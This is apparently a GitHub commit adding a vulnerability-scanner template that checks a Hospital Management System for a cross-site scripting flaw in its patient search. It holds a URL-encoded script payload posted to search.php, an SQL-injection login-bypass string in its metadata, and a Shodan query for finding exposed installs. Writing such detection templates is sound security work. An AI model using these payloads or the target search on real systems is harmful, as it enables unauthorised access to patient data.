Create hms-xss.yaml

patch-1
Arafat Ansari 2022-09-14 18:31:55 +05:30 committed by GitHub
parent 19de5ca8df
commit 1b9b7e3ac0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: hms-xss
info:
name: Hospital Management System v1.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
metadata:
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
shodan-query: http.html:"Hospital Management System"
verified: true
tags: hms,hospital,cms,xss
requests:
- raw:
- |
POST /hms/doctor/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}password={{password}}&submit=
- |
POST /hms/doctor/search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
searchdata=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search=
skip-variables-check: true
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert("XSS")</script>'
- type: status
status:
- 200